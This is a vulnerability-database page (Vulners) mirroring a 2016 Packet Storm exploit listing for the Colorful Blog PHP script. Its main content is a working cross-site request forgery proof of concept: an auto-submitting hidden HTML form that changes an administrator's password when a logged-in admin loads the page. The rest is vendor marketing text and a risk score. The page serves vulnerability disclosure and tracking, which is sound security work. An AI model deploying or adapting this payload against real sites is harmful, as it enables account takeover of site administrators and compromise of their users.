Lucene search
K

Colorful Blog Cross Site Request Forgery

🗓️ 13 Oct 2016 00:00:00Reported by BesimType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Colorful Blog CSRF Change Admin Pas

Code
`# Exploit Title :----------- : Colorful Blog - Cross-Site Request Forgery (Change Admin Pass)  
# Author :------------------ : Besim  
# Google Dork :---------- : -  
# Date :--------------------- : 13/10/2016  
# Type :--------------------- : webapps  
# Platform :---------------- : PHP   
# Vendor Homepage :-- : -  
# Software link :---------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html  
  
  
Description :   
  
You can change admin's password with CSRF, if you know admin's username  
  
########################### CSRF PoC ###############################  
  
<html>  
<!-- CSRF PoC -->  
<body>  
<form action="http://site_name/path/yonetim/admin.php" method="POST">  
<input type="hidden" name="username" value="admin_username" />  
<input type="hidden" name="password" value="besim" />  
<input type="hidden" name="gonder" value="Kaydet" />  
<input type="submit" value="Submit request" />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
  
####################################################################  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Oct 2016 00:00Current
0.5Low risk
Vulners AI Score0.5
20